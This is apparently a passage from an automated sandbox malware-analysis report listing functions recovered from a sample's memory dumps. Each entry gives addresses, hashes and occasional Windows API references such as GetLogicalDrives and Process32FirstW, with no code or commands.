                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 9ed5b78e5608a3ae3a8aad5aca8ed711e2cf1b89e41254a2e80ef7071ca23f62
                                                            • Instruction ID: 420581b2fd53cb782c2aac6360016de09fc84759e9b3081619dc6a64a7aadb16
                                                            • Opcode Fuzzy Hash: 9ed5b78e5608a3ae3a8aad5aca8ed711e2cf1b89e41254a2e80ef7071ca23f62
                                                            • Instruction Fuzzy Hash: BD219DEB90C211FEB34355612A446FB6F7AE8C3230334A479F443C6A4BE395550D6271
                                                            Function 06DB0C60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 9fbde36ec8e0ebaabf59684fb8e633d5801cfbf5656ebee77974323635e63bad
                                                            • Instruction ID: 2be89efb8e48cb788e2fdf88e9c95177e02aaf8bf31fbbf59d97ab06ca6b815b
                                                            • Opcode Fuzzy Hash: 9fbde36ec8e0ebaabf59684fb8e633d5801cfbf5656ebee77974323635e63bad
                                                            • Instruction Fuzzy Hash: 152104EB54C211FDB38295A57B14AFBAB7DE4C3730370A43AF443D294AE7E09A0951B1
                                                            Function 06DA0541 Relevance: 3.1, Strings: 2, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: c33031a152a5edceb34fb8ab721b72453b1977a3cdcc9ae4965eb3883a177f59
                                                            • Instruction ID: 9396edff23ecf7620b74b719d476c415d8b3050667c8ce823aa9bc323922f1d4
                                                            • Opcode Fuzzy Hash: c33031a152a5edceb34fb8ab721b72453b1977a3cdcc9ae4965eb3883a177f59
                                                            • Instruction Fuzzy Hash: 37D1E0FB50C310BEF381D5816B54BFA677EE7D6338B308426F483D5502E3A88A4A55B1
                                                            Function 06DA05F9 Relevance: 3.1, Strings: 2, Instructions: 586COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 1c641e8217130fe15973728e2fbff3faf000a159ff195693dc31b16501118fa3
                                                            • Instruction ID: 146c7e74e330a736b8a7d7063439f2d240cce4ec61078a883d1fba4dba080b19
                                                            • Opcode Fuzzy Hash: 1c641e8217130fe15973728e2fbff3faf000a159ff195693dc31b16501118fa3
                                                            • Instruction Fuzzy Hash: 9FC101F750C311BEF78185816B54BFA6B7EE7D6338F308426F483D4502E3A88A4A45B1
                                                            Function 06DA059C Relevance: 3.1, Strings: 2, Instructions: 578COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 5f9ea03b2697fa1f2bd5fc184fa09ec7531af80bff5a5078bab71cc63474b179
                                                            • Instruction ID: e5daed91a3f45de488b76430d1b1a0606c3025dc2df66713646e6f808d84ed28
                                                            • Opcode Fuzzy Hash: 5f9ea03b2697fa1f2bd5fc184fa09ec7531af80bff5a5078bab71cc63474b179
                                                            • Instruction Fuzzy Hash: 8DC102F750C311BDF78196816B54BFA677EE7D6338F308426F483D4502E3A88A4A55B1
                                                            Function 06DA05AC Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 8e83cc31734e6d80e840c9210b8a4b566c07e1e2a5c9a375485a5f6328d1b305
                                                            • Instruction ID: ab8c15c8fb8f2dca59f5f8b7cf00ade2f9d3004c57e17dff29191b4232fd999b
                                                            • Opcode Fuzzy Hash: 8e83cc31734e6d80e840c9210b8a4b566c07e1e2a5c9a375485a5f6328d1b305
                                                            • Instruction Fuzzy Hash: 87C122F740C310BEF38186816B54BFA677EE7D6338F308426F483D5542E3A88A4A45B1
                                                            Function 06DA0626 Relevance: 3.1, Strings: 2, Instructions: 575COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 981bdf19d71c352e4046075f012283fbe8dc836e06effe1527ace135ebc30fc4
                                                            • Instruction ID: 9a480d5a531f9ccc4c9675dbe8b71378f37fe4011d1108a66eada8e0d7921202
                                                            • Opcode Fuzzy Hash: 981bdf19d71c352e4046075f012283fbe8dc836e06effe1527ace135ebc30fc4
                                                            • Instruction Fuzzy Hash: DEC123F740C310BDF78286816B54BFA6B7EE7D6339F308426F483D4502E3A88A4A45B1
                                                            Function 06DA05BE Relevance: 3.1, Strings: 2, Instructions: 572COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 9d25b6593472af868e9658893b7c421864aa835e440c9104d879b042a3ffba84
                                                            • Instruction ID: 6bcf062e0fc219360d2ed9de74627e6ba56e45b3a2d6f11c63336bf38b94e275
                                                            • Opcode Fuzzy Hash: 9d25b6593472af868e9658893b7c421864aa835e440c9104d879b042a3ffba84
                                                            • Instruction Fuzzy Hash: 14C113F740C310BEF78295816B54BFA677EE7C6339F308426F483D5542E3988A4A45B1
                                                            Function 06DA0664 Relevance: 3.0, Strings: 2, Instructions: 501COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 076e6e97b71c922cb4f54e91db77660c36ea080b8d4410f4612a26e44bea05dc
                                                            • Instruction ID: 0c8f2ef0f5a37fd3202913aa3caab9526f60b4a265be2ee1abfbb2fe335da3bb
                                                            • Opcode Fuzzy Hash: 076e6e97b71c922cb4f54e91db77660c36ea080b8d4410f4612a26e44bea05dc
                                                            • Instruction Fuzzy Hash: EAB102F780C311BEF78195815B44BFA6B7EE7D6338F308426F487E5542E3A88A4A45B1
                                                            Function 06DA0674 Relevance: 3.0, Strings: 2, Instructions: 478COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: a912707f737abdc3e4430158053a9880115019370962e485905d716dcace9f11
                                                            • Instruction ID: 57bd4ebccef47ceaa93befdba803ba649d29d229d319442fc658fdd5a7b7e4ed
                                                            • Opcode Fuzzy Hash: a912707f737abdc3e4430158053a9880115019370962e485905d716dcace9f11
                                                            • Instruction Fuzzy Hash: 1BB112F780C310BEF78195815B44BFA6B7EE7D6339F308526F487E4542E3A88A4A45B1
                                                            Function 06DA06CB Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: d5cfc4c142a18557b61d59838090900294bf2350c95f1bf926fe9e1b1d6cdf6c
                                                            • Instruction ID: e74299320af7238baa7e5ad97806851a745be00b6dd6c754f6c709abde0f1bdf
                                                            • Opcode Fuzzy Hash: d5cfc4c142a18557b61d59838090900294bf2350c95f1bf926fe9e1b1d6cdf6c
                                                            • Instruction Fuzzy Hash: BFA1F2F780C310BDF7C196819B44BFA677EE7D6339F308426F487A5502E3A88A4945B1
                                                            Function 06DA06BE Relevance: 3.0, Strings: 2, Instructions: 457COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 94ad01c5ab6a153bfdfad2cd0b7fca0a714722c009c411ff3d6046feb24f4353
                                                            • Instruction ID: f8f1c836a1d7ed31607f3668f09d5547acdfd82f0017ce7babf647a9b7d63106
                                                            • Opcode Fuzzy Hash: 94ad01c5ab6a153bfdfad2cd0b7fca0a714722c009c411ff3d6046feb24f4353
                                                            • Instruction Fuzzy Hash: 7FA1F1F780C310BEF78195815B44BFA6B7EE7D6339F308426F487A5542E3A88A4945B1
                                                            Function 06DA075E Relevance: 2.9, Strings: 2, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 8ac54404889a956148646f626dbc699a9a15ff76ed23de135a7f21a778b99f5f
                                                            • Instruction ID: 9ffab33bfe565aa992dc332cb8b4904651ec30dccb723aaa4e7e6f5658818362
                                                            • Opcode Fuzzy Hash: 8ac54404889a956148646f626dbc699a9a15ff76ed23de135a7f21a778b99f5f
                                                            • Instruction Fuzzy Hash: 5BA105F790C310BDF7C196815B44BFA6B7EE79633DF308426F487A5502E2A88A4945F1
                                                            Function 06DA0706 Relevance: 2.9, Strings: 2, Instructions: 427COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: acaec8dc5c32905afc18bb419daeaecfde94e866e2dc09742bd759cc7f3eaf0a
                                                            • Instruction ID: c890e22a5fb1721a073455330447370b3252d2d237cefedbb96f2edb03658b6f
                                                            • Opcode Fuzzy Hash: acaec8dc5c32905afc18bb419daeaecfde94e866e2dc09742bd759cc7f3eaf0a
                                                            • Instruction Fuzzy Hash: 14A1F2F780C311BEF78196815B44BFA6B7EE79633DF308426F487A5502E2A88A4945F1
                                                            Function 06DA071A Relevance: 2.9, Strings: 2, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: e5723cbb829c0fd2588d836c1778ce7130ffc35bb98f2e9bd63cf4de91a06c21
                                                            • Instruction ID: ec4dc3577ebce02532e13471a8c72ddc59fe232b4720b8f3cfcf6817543c64d4
                                                            • Opcode Fuzzy Hash: e5723cbb829c0fd2588d836c1778ce7130ffc35bb98f2e9bd63cf4de91a06c21
                                                            • Instruction Fuzzy Hash: D191E4F780C310BEF78196819B44BFA677EE79633DF308426F487A5502E3A88A4955F1
                                                            Function 06DA079A Relevance: 2.9, Strings: 2, Instructions: 403COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 400569ac762770bf1c4a9f391244e9fed9c80f682a1666fd61cdf94e7f153aff
                                                            • Instruction ID: 29ce1a1edc753319889d8becfd6acf3bc513791c2b891fd130c47a188a7240d0
                                                            • Opcode Fuzzy Hash: 400569ac762770bf1c4a9f391244e9fed9c80f682a1666fd61cdf94e7f153aff
                                                            • Instruction Fuzzy Hash: 9B9102F744C310BEF78295815B44BFA6B7EE7D633DF308426F487A5502E2A88A4945F1
                                                            Function 06DA0784 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            • Opcode ID: 64a58150901d9c46753ccc7ac456de8a3700eff3add799f14e92a7cbda8a5aea
                                                            • Instruction ID: 4a363711ee498e3a29be0f522a7447a690082b06e02ae22bca1787d88cbf6ad9
                                                            • Opcode Fuzzy Hash: 64a58150901d9c46753ccc7ac456de8a3700eff3add799f14e92a7cbda8a5aea
                                                            • Instruction Fuzzy Hash: 488100F740C310BEF78295815B44BFA6B7EE7DA339F308426F487A5502E2A88A4955F1
                                                            Function 06E00000 Relevance: 1.9, APIs: 1, Instructions: 371COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: efd11387ef169dbe7747e77230df723283ea4bf56548e95fcdd230c43f8595c7
                                                            • Instruction ID: f64d5eeb3ac216cd1b2c8fea75982dde95d1ef9e9b0d0607ded89e5a6b58693f
                                                            • Opcode Fuzzy Hash: efd11387ef169dbe7747e77230df723283ea4bf56548e95fcdd230c43f8595c7
                                                            • Instruction Fuzzy Hash: 7C7105E714C3217EB38385552B58BFA6B6EE6D73307309426F403DB5C3E2984A8E51B1
                                                            Function 06E00007 Relevance: 1.8, APIs: 1, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17b0f154d4c942b53ef63251953002634735648e3c9724bbc2302d3abfd8cd85
                                                            • Instruction ID: c8448d4631df59176276c1f5c444a7f34182ba9073c2f7f317c83ff4a13fe27e
                                                            • Opcode Fuzzy Hash: 17b0f154d4c942b53ef63251953002634735648e3c9724bbc2302d3abfd8cd85
                                                            • Instruction Fuzzy Hash: AC61B2E714C3217DB39385852B18FFA6B6EE6D67307309426F807DB5C2E2D84ACA51B1
                                                            Function 06E00085 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c61688adab481018e3e4821d907f82c94d05ce578c86cddf44c6a81f2f0d848
                                                            • Instruction ID: b83812c2fa604b0f94411e50865e261ed0955f4666acd48133bcbb47fe55edbc
                                                            • Opcode Fuzzy Hash: 3c61688adab481018e3e4821d907f82c94d05ce578c86cddf44c6a81f2f0d848
                                                            • Instruction Fuzzy Hash: CE5193E714C221BDB29385856B18FFA676EE2D6730730A426F807D75C2E3984ACE51F1
                                                            Function 06E00033 Relevance: 1.8, APIs: 1, Instructions: 316COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 367f34ee9f8b06affe45e7211c416be15a85e3367a23d6741620804217350df1
                                                            • Instruction ID: bb2cb9d978199f8fdefc61c453a2410eb3b7e8dd95a044358a6e94fad63e08ba
                                                            • Opcode Fuzzy Hash: 367f34ee9f8b06affe45e7211c416be15a85e3367a23d6741620804217350df1
                                                            • Instruction Fuzzy Hash: BB5181E714C221BDB29385856B18FFA676EE2D6730730A426F807D75C2E3D84ACA11B1
                                                            Function 06E0003E Relevance: 1.8, APIs: 1, Instructions: 316COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 40735b8f50c8ca636e6b849d7197bbbf40746f82b521f841d0abfbb17dc90f43
                                                            • Instruction ID: fde3f6e0256e6c03422eb4e9d12ce14b2a5398672fe9fe2b995911c92af222be
                                                            • Opcode Fuzzy Hash: 40735b8f50c8ca636e6b849d7197bbbf40746f82b521f841d0abfbb17dc90f43
                                                            • Instruction Fuzzy Hash: AC5192E714C211BDB39385856B18FFA6B6EE2D6730730A426F807D65C2E2984ACA51B1
                                                            Function 06E0005A Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: b603fba1906b08305440ceb3a1939d5bfb10e5dc78b804cf3931685316ea64b4
                                                            • Instruction ID: ee56f7522d3a35d693ac53187c4c61a58b5e1410cb2ef3e7f28b42da55271481
                                                            • Opcode Fuzzy Hash: b603fba1906b08305440ceb3a1939d5bfb10e5dc78b804cf3931685316ea64b4
                                                            • Instruction Fuzzy Hash: F851C2E714C221BDB29385852B18FFA676EE6D67307309426F807DB5C2E3984ACE11F1
                                                            Function 06E000A1 Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e4e59800f85f30015bb506246f560836a85542c1ad345be281415a008d610c09
                                                            • Instruction ID: c5307197d59544a187faef4dedf57a10fccc36aaca23ad5482c075f0b0426d50
                                                            • Opcode Fuzzy Hash: e4e59800f85f30015bb506246f560836a85542c1ad345be281415a008d610c09
                                                            • Instruction Fuzzy Hash: D751F5A714C321BEB38384552B54BFB6B6EE5D6330730A466F407D75C2E2984A8A51B1
                                                            Function 06E000F0 Relevance: 1.8, APIs: 1, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb9ec20d3d5a65de33fbadda852b561bfb271fc99c41d4b5445b69766958483a
                                                            • Instruction ID: 509ad541c83af7e8762bc2aa81ebd81e3cd7577ac357af51daf1a6216298ae02
                                                            • Opcode Fuzzy Hash: cb9ec20d3d5a65de33fbadda852b561bfb271fc99c41d4b5445b69766958483a
                                                            • Instruction Fuzzy Hash: 1451B1E714C321BDB39381456B18FFB676EE1D6730730A426F807DB6C2E3984A8A51B1
                                                            Function 06E0014A Relevance: 1.7, APIs: 1, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: c0c8d2a351a1fe1e4b985359690a6f90b363b458cf2da00607d04826dcbbf653
                                                            • Instruction ID: c6a1b75a89bfda08c877fb9fd83ca68911c2acba1d21fc9cf30d1f36eadc528e
                                                            • Opcode Fuzzy Hash: c0c8d2a351a1fe1e4b985359690a6f90b363b458cf2da00607d04826dcbbf653
                                                            • Instruction Fuzzy Hash: F541F9A714C311BEB3D385415B58BF66B6EE5E6330730A466F403DB5C2E3984ACA41F1
                                                            Function 06E0016D Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b8b5125f960ae96693017c52dde8f3238611ab1b81d1554b1ca5e29e12a2ad7
                                                            • Instruction ID: 808aaef51861f1c98e6989f9c3df692d3a19bbef772f595d2be4a9b3684dcf70
                                                            • Opcode Fuzzy Hash: 1b8b5125f960ae96693017c52dde8f3238611ab1b81d1554b1ca5e29e12a2ad7
                                                            • Instruction Fuzzy Hash: 3341C5A714C321BEB3D381411B58BF6676EE5E7370730A462B407DB5C2E7984ACA41F4
                                                            Function 06E0018D Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a52856baf898152074104a131996c781198cd9f2b84619f326cd8aaeff67f9dd
                                                            • Instruction ID: efa98366ea89cdaf41d507d087b93f4433db9a4a4b133c7cf9ba5b71dc39babe
                                                            • Opcode Fuzzy Hash: a52856baf898152074104a131996c781198cd9f2b84619f326cd8aaeff67f9dd
                                                            • Instruction Fuzzy Hash: CA41D5A714C311BEB3D385815B58BFA572EE5E7770731A422B803DB5C2E3984ACA41F1
                                                            Function 06E001A9 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a8ae7e5afe538e1d4b85eb613b962290bac9681f1f5eba8c3925d6ef9c2d04ae
                                                            • Instruction ID: fa454e4263b9c43e4560524f9fbcf85c5a84e8c3c145a4dcab0f42394337d572
                                                            • Opcode Fuzzy Hash: a8ae7e5afe538e1d4b85eb613b962290bac9681f1f5eba8c3925d6ef9c2d04ae
                                                            • Instruction Fuzzy Hash: 8D41D5A718C311BEB3D381815B58BF6572EE5E7370730A422B803DB5C2E3984ACA41F4
                                                            Function 06E001B8 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 822c048a8b797ec702bb63da9545dec047603deba909f310ec6f08ddf002825c
